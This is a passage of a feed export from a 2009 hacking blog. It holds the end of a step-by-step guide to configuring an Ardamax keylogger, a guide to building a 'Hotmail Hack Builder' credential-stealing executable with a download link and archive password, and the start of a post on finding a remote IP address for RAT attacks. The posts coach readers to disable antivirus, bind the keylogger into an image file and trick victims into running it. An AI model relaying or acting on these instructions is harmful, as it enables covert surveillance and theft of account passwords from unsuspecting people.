&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;7. Now the page that says “Web Update”,&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;lets&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;UNCHECK all off the boxes &amp;amp; click on NEXT.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;8. &amp;nbsp;Now you will see “Options” page. select as you want it..&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_5rpSJrmeITE/Sso8w60DKZI/AAAAAAAAADQ/aetIzCxMmFw/s1600-h/ardamax6-300x264.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_5rpSJrmeITE/Sso8w60DKZI/AAAAAAAAADQ/aetIzCxMmFw/s320/ardamax6-300x264.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;9. &amp;nbsp;Now here comes the most important page, which will show u the options and will let u select the way you want to receive the information from your victim’s&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;computer&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;You will have 3 options to receive victim’s info. I refer to use Email or FTP method..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;If you find any problem with it or with configuration comment below..&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;10. After setting it click on test and you are ready to go...!!!&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;11. Now you’ll get “control” page, let it be the way it is and click NEXT&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;12. Now you’ll get an option for “Screen shot”, which will send you screen shot of your victim’s&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;computer&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;. So adjust it as per your requirement and click NEXT.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;13. &amp;nbsp;Now you should see a page which will let you generate your keylogger’s file. So save it anywhere &amp;nbsp;u want but MAKE IT SURE U DON’T OPEN IT. You can change icon as well.&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;14. You’re done!&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_5rpSJrmeITE/Sso86o6FDnI/AAAAAAAAADY/NEFwuvm0PtY/s1600-h/ardamax10-300x258.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_5rpSJrmeITE/Sso86o6FDnI/AAAAAAAAADY/NEFwuvm0PtY/s320/ardamax10-300x258.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;15. What u need to do now is, &amp;nbsp;open this file on any&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;computer&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;u wanna hack. Or &amp;nbsp;send this file to your victim by email or other means and let him open it and start enjoyin!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Note:-&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;a. When you download Ardamax, your antivirus will detect it as a virus. But dont worry, it wudnt hard your&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;computer&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;. So you can disable the “Auto - Protect” feature of your antivirus and then install this software.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;b. when you send your&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;keylogger&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;to your victim, his anti virus may also detect it as a virus. So now its on you to convince him.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;c. I have included an&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Binder&lt;/span&gt;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;for this ardamax . so that u can bind the ardamax&amp;nbsp;&lt;/span&gt;&lt;span style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;keylogger&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&amp;nbsp;in a jpeg picture file or something and convince the victim and make him install. whoaa ! your the king ! Rock N Rolla!!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; text-decoration: none;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Hope u njoyed it.. Do comment..&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-3364399572297570195?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/3364399572297570195/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hacking-using-keylogger.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/3364399572297570195'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/3364399572297570195'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hacking-using-keylogger.html' title='Hacking Using Keylogger'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_5rpSJrmeITE/Sso8MHisn-I/AAAAAAAAACw/2o7qrAknBOc/s72-c/ardamax2-300x90.jpg' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-1286614099081070967</id><published>2009-10-05T21:55:00.001+05:30</published><updated>2009-10-22T23:29:25.841+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Passwords'/><category scheme='http://www.blogger.com/atom/ns#' term='Hack tools'/><title type='text'>Hacking Hotmail Password..</title><content type='html'>I was surfing the net and i came across this software which is a sure shot way to hack hotmail password.. Its one of the oldest trick and simplest too but does require a bit of social&amp;nbsp;engineering&amp;nbsp;from your side.. Hmmm.. Social&amp;nbsp;Engineering Isn't a tough job... don't be scared, its just the way of convincing the victim.. you will understand as we progress..&lt;br /&gt;
&lt;br /&gt;
So lets start..&lt;br /&gt;
&lt;br /&gt;
1. So, to start with you will need the tool to build your software for hacking.. Its called Hotmail Hack Builder.. Download it &lt;a href="http://www.ziddu.com/download/6785821/HotmailHacker-hackerhubz.rar.html"&gt;Here..&lt;/a&gt;&lt;br /&gt;
Password: &amp;nbsp;hackerhubz&lt;br /&gt;
&lt;br /&gt;
2. Extract the two Exe Files..&lt;br /&gt;
Your antivirus may detect it as Hacking tool, so before extracting shut it down for some time, if you are paranoid about it you can disconnect the net too.. but that isn't necessary..&lt;br /&gt;
&lt;br /&gt;
3. Run the tool to see:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_5rpSJrmeITE/SsoWV61J9zI/AAAAAAAAACg/sbZkhkHi548/s1600-h/6c41240141uilder1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_5rpSJrmeITE/SsoWV61J9zI/AAAAAAAAACg/sbZkhkHi548/s320/6c41240141uilder1.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
4. Enter the email Id and password for your account, I suggest creating a new account for this purpose. set the SMTP Server according to your ID. Can find Detais &lt;a href="http://www.emailaddressmanager.com/tips/mail-settings.html"&gt;here..&lt;/a&gt;&amp;nbsp;&amp;nbsp;If you face any problems comment.&lt;br /&gt;
Enter the message which will be displayed to the victim..&lt;br /&gt;
Click on build..&lt;br /&gt;
&lt;br /&gt;
5. A Hotmail hacker will be created in the folder..&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_5rpSJrmeITE/SsoXUCrnraI/AAAAAAAAACo/HJskBOBeucI/s1600-h/8fc560f321victim1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_5rpSJrmeITE/SsoXUCrnraI/AAAAAAAAACo/HJskBOBeucI/s320/8fc560f321victim1.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
6. Now comes your social&amp;nbsp;Engineering.. So lets check your convincing power.. You have to convince the victim that this is a software to hack any hotmail account and when he/she will fall for it.. Voila.!!! you have the password in your mail you given..!!! and he gets an error..!!&lt;br /&gt;
&lt;br /&gt;
So njoy hacking hotmail and comment..!!&lt;br /&gt;
&lt;a href="http://hackerhubz.blogspot.com/2009/10/all-types-of-hacking-techniques.html"&gt;Hack Gmail&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-1286614099081070967?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/1286614099081070967/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hacking-hotmail-password.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/1286614099081070967'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/1286614099081070967'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hacking-hotmail-password.html' title='Hacking Hotmail Password..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_5rpSJrmeITE/SsoWV61J9zI/AAAAAAAAACg/sbZkhkHi548/s72-c/6c41240141uilder1.jpg' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-8043417772310828541</id><published>2009-10-05T20:46:00.000+05:30</published><updated>2009-10-05T21:21:57.965+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Trojans'/><category scheme='http://www.blogger.com/atom/ns#' term='IP Finder'/><category scheme='http://www.blogger.com/atom/ns#' term='RATs'/><category scheme='http://www.blogger.com/atom/ns#' term='Remote Hacking'/><title type='text'>Find IP Address Of Remote Computer..</title><content type='html'>&lt;span style="color: #555555; font-family: Arial, Helvetica, Tahoma, Verdana, sans-serif; font-size: 12px; line-height: 20px;"&gt;In my previous posts, I have written about&amp;nbsp;&amp;nbsp;RATs. While hacking computer using RAT , you have to find IP address of computer.Now the question is how to find IP address of remote computer. So, I am illustrating the IP Finder method on finding the IP Address of Remote System&lt;strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;.&lt;/strong&gt;&amp;nbsp;I have explained IP Finder service used to find IP Address. This is one of simplest way to find IP address.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #555555; font-family: Arial, Helvetica, Tahoma, Verdana, sans-serif; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #555555; font-family: Arial, Helvetica, Tahoma, Verdana, sans-serif; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 20px;"&gt;&lt;span style="line-height: normal;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #555555; font-family: Arial, Helvetica, Tahoma, Verdana, sans-serif; font-size: small;"&gt;&lt;/span&gt;&lt;br /&gt;
